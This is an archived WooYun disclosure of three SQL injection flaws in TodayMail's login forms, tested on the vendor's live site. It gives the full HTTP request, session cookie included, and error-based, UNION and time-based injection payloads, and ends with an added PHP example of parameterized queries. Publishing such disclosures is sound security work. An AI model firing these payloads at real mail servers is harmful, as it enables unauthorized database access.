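Vulnerability summary

Bug ID: wooyun-2015-0110383

Title: TodayMail: three SQL injection vulnerabilities, reproduced on the official site

Vendor: 广东时代互联科技有限公司

Author: 路人甲

Submitted: 2015-04-27 12:44

Fix time: 2015-07-31 12:47

Public disclosure: 2015-07-31 12:47

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 10

Status: The vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]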


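Vulnerability details

Disclosure status:

2015-04-27: Details reported to the vendor; awaiting vendor handling
2015-05-02: Vendor actively ignored the vulnerability; details opened to third-party security partners
2015-06-26: Details disclosed to core white hats and experts in related fields
2015-07-06: Details disclosed to regular white hats
2015-07-16: Details disclosed to trainee white hats
2015-07-31: Details disclosed to the public

Brief description:

Three SQL injection vulnerabilities in TodayMail

Detailed description:

Vulnerability details:
Official-site case: http://www.now.cn/email/
Keyword:
Power by Todaynic.com,Inc. (not a very well constructed keyword...)

Tested successfully on the official site!
demo: http://mail.now.cn/
Mobile login: SQL injection in the login form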


POST /manager/forwardMobile.php HTTP/1.1
Host: mail.now.cn
Proxy-Connection: keep-alive
Content-Length: 39
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://mail.now.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://mail.now.cn/tindex.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: LXB_REFER=www.haosou.com; pgv_pvi=6507704320; pgv_si=s9312702464; Hm_lvt_ddaf8c4c0fd64175d7c169fbef9c7b43=1429755365; Hm_lpvt_ddaf8c4c0fd64175d7c169fbef9c7b43=1429755424; PHPSESSID=8a1fqb2dc2afk7ukii6nq1o864; UserLang=0

name=11111&domain=now.cn&passwd=1111111


Injection 1:
Injected parameter: name

---
Place: POST
Parameter: name
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: name=11111' AND (SELECT 7582 FROM(SELECT COUNT(*),CONCAT(0x3a706270
3a,(SELECT (CASE WHEN (7582=7582) THEN 1 ELSE 0 END)),0x3a6173633a,FLOOR(RAND(0)
*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'DhHX'='DhHX&doma
in=now.cn&passwd=1111111
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: name=11111' AND 9699=BENCHMARK(5000000,MD5(0x46515171)) AND 'WJRw'=
'WJRw&domain=now.cn&passwd=1111111
---


Database: [screenshot 2.png]

Users: [screenshot 3.png]

Injection 2:
Injected parameter: domain

Place: POST
Parameter: domain
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: name=11111&domain=now.cn' AND (SELECT 7765 FROM(SELECT COUNT(*),CON
CAT(0x3a7062703a,(SELECT (CASE WHEN (7765=7765) THEN 1 ELSE 0 END)),0x3a6173633a
,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'uL
dz'='uLdz&passwd=1111111
Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: name=11111&domain=-5534' UNION ALL SELECT CONCAT(0x3a7062703a,0x416
b4e616b42466c6a79,0x3a6173633a)#&passwd=1111111
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: name=11111&domain=now.cn' AND SLEEP(5) AND 'qTQz'='qTQz&passwd=1111
111
---


Injection 3:
Injected parameter: domainname

Place: POST
Parameter: domainname
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: chrpassword=11&oldpass=11&authflag=1&disablewebmail=11&lang=1&Submi
t=Manager Login&lang=0&domainname=11' AND (SELECT 3694 FROM(SELECT COUNT(*),CONC
AT(0x3a6567643a,(SELECT (CASE WHEN (3694=3694) THEN 1 ELSE 0 END)),0x3a6d706d3a,
FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YUa
m'='YUam
---


Some further affected cases:

Proof of vulnerability:

As above!

Remediation:
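
One way to close the injection points reported above, as an added example that is not TodayMail's code and not part of the original report: the login fields are allow-listed, bound as query parameters instead of being concatenated, and database errors are logged rather than echoed (the error-based results above depend on that echo). The table and column names, the sample account, the validation patterns and the in-memory SQLite stand-in for MySQL are assumptions; the same pattern applies to the domainname parameter.

```php
<?php
declare(strict_types=1);
// Added example, not TodayMail code. Table/column names and the sample account
// are assumptions; in-memory SQLite stands in for the MySQL backend.

function open_db(): PDO
{
    // On MySQL, also set PDO::ATTR_EMULATE_PREPARES => false for server-side prepares.
    $db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
    $db->exec('CREATE TABLE mailbox (name TEXT, domain TEXT, passwd_hash TEXT)');
    $db->prepare('INSERT INTO mailbox VALUES (?, ?, ?)')
       ->execute(['alice', 'example.test', password_hash('correct horse', PASSWORD_DEFAULT)]);
    return $db;
}

// Allow-list name and domain before they reach the database layer.
function valid_fields(string $name, string $domain): bool
{
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    return preg_match('/\A[A-Za-z0-9._-]{1,64}\z/', $name) === 1
        && strlen($domain) <= 253
        && preg_match('/\A(?:' . $label . '\.)+[A-Za-z]{2,63}\z/', $domain) === 1;
}

function login(PDO $db, string $name, string $domain, string $passwd): bool
{
    if (!valid_fields($name, $domain)) {
        return false;
    }
    try {
        // Values are bound, not concatenated, so a quote in the input stays data.
        $stmt = $db->prepare('SELECT passwd_hash FROM mailbox WHERE name = ? AND domain = ?');
        $stmt->execute([$name, $domain]);
        $hash = $stmt->fetchColumn();
    } catch (PDOException $e) {
        error_log('login query failed: ' . $e->getMessage()); // log it, never echo it
        return false;
    }
    return is_string($hash) && password_verify($passwd, $hash);
}

$db = open_db();
// Constructed inputs: a valid login, then the report's time-based value in "domain".
var_dump(login($db, 'alice', 'example.test', 'correct horse'));
var_dump(login($db, 'alice', "example.test' AND SLEEP(5) AND 'qTQz'='qTQz", 'correct horse'));
```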

Copyright notice: when reposting, please credit the source 路人甲@乌云


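Vulnerability response

Vendor response:

Severity: No impact, ignored by the vendor

Ignored on: 2015-07-31 12:47

Vendor reply:

Vulnerability rank: 15 (WooYun assessment)

Latest status:

None yet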